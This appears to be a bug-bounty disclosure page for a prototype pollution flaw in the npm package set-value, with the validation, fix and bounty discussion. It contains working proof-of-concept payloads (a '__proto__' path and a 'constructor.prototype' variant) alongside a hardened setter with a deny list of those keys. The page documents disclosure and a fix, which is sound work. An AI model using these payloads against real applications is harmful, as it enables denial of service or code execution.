Prototype Pollution in jonschlinkert/set-value

Valid

Reported on

Aug 30th 2021


✍️ Description

The set-value package is vulnerable to Prototype Pollution. Its set function does not validate which object properties it updates, so an attacker who controls the path can write to Object.prototype, adding or modifying a property on every object in the process.

🕵️‍♂️ Proof of Concept

Create the following PoC file:

// poc.js
var setValue = require("set-value")
let obj = {}
console.log("Before: " + {}.polluted)
// nested-array path resolves to obj.__proto__.polluted, i.e. Object.prototype.polluted
setValue(obj, [['__proto__'], 'polluted'], 'Yes! Its Polluted')
console.log("After: " + {}.polluted)

Execute the following commands in the terminal:

npm i set-value # Install affected module
node poc.js # Run the PoC

Check the Output:

Before : undefined
After : Yes! Its Polluted

💥 Impact

It may lead to information disclosure, denial of service, or remote code execution.

ready-research submitted a
24 days ago
ready-research
24 days ago

Researcher


var setValue = require("set-value")
let obj = {}
console.log("Before: " + {}.polluted)
setValue(obj, [['constructor'], ['prototype'], 'polluted'], 'Yes! Its Polluted')
console.log("After: " + {}.polluted)
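A hardened path-based setter, added here as an example and not set-value's own code or the code of its fix (the names safeSetValue, normalizePath, FORBIDDEN_KEYS and demo are this example's own), that rejects both the __proto__ path from the PoC and the constructor/prototype variant posted above, while still allowing ordinary nested writes:

```javascript
// Added defensive example (not set-value's own code or its fix): a path-based
// setter that refuses to traverse or write prototype-bearing keys.
// The helper names and error messages below are this example's own choices.
const FORBIDDEN_KEYS = new Set(['__proto__', 'constructor', 'prototype']);

// Flatten the path the way the PoC passes it: an array whose elements may be
// strings or nested arrays, or a dotted string such as 'a.b.c'.
function normalizePath(path) {
  if (typeof path === 'string') return path.split('.');
  if (!Array.isArray(path)) throw new TypeError('path must be a string or an array');
  return path.flat(Infinity).map(String);
}

function isPlainObject(v) {
  return v !== null && typeof v === 'object' && !Array.isArray(v);
}

function safeSetValue(target, path, value) {
  if (!isPlainObject(target)) throw new TypeError('target must be a plain object');
  const keys = normalizePath(path);
  if (keys.length === 0) throw new TypeError('empty path');
  // Reject every segment up front, not just the last one: a forbidden key in the
  // middle of the path ('constructor' then 'prototype') is the dangerous case.
  for (const key of keys) {
    if (FORBIDDEN_KEYS.has(key)) {
      throw new Error(`refusing to set prototype-bearing key: ${key}`);
    }
  }
  let node = target;
  for (let i = 0; i < keys.length - 1; i++) {
    const key = keys[i];
    // Only descend into own, plain-object properties; anything inherited or
    // non-object is replaced with a fresh container on the target itself.
    if (!Object.prototype.hasOwnProperty.call(node, key) || !isPlainObject(node[key])) {
      node[key] = {};
    }
    node = node[key];
  }
  node[keys[keys.length - 1]] = value;
  return target;
}

// Replays the two paths from the report against the hardened setter and checks
// that Object.prototype stayed clean afterwards.
function demo() {
  const attempts = [
    [['__proto__'], 'polluted'],                   // path from the PoC
    [['constructor'], ['prototype'], 'polluted'],  // variant from the comments
  ];
  const rejected = attempts.map((p) => {
    try {
      safeSetValue({}, p, 'Yes! Its Polluted');
      return false;
    } catch (e) {
      return true;
    }
  });
  const benign = safeSetValue({}, 'a.b.c', 1);
  return { rejected, prototypeClean: ({}).polluted === undefined, benign };
}

console.log(JSON.stringify(demo()));
```

Rejecting the three keys at every depth is the check that matters; validating only the final segment would still let the constructor.prototype path through. As a coarse, process-wide backstop for code you do not control, freezing Object.prototype with Object.freeze(Object.prototype) at startup makes such writes fail silently (or throw in strict mode) instead of succeeding.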

Jon Schlinkert validated this vulnerability 11 days ago
ready-research has been awarded the disclosure bounty
The fix bounty is now up for grabs
ready-research
11 days ago

Researcher


@admin @adam please read the comments in https://github.com/jonschlinkert/set-value/pull/33

Jamie Slome
10 days ago

Admin


@ready-research - I have commented on the GitHub pull request.

Chad Whitacre
a day ago

Based on the PR in set-value it seems that @ready-research should be awarded the fix bounty. Is there no way to do that without the repo maintainer's cooperation? Clearly you can't force the repo maintainer to cooperate, and it seems unfair to @ready-research not to override somehow here.

Jamie Slome
a day ago

Admin


@chad - we are improving our automation in this - generally our system would have picked it up if the permalink reference in the report had matched that of the fix.

But seeing as @ready-research's fix was used - we will definitely look to reward the bounty here.

Thanks for your feedback! 🎉

Jamie Slome confirmed that a fix has been merged on b057b1 a day ago
ready-research has been awarded the fix bounty
Jamie Slome
a day ago

Admin


@ready-research - just a heads up that in the future, avoid opening the PR in public, as it can break the responsible disclosure.

Great work all!

ready-research
a day ago

Researcher


@chad Thank you.

@jamie Yeah, sure. Thanks.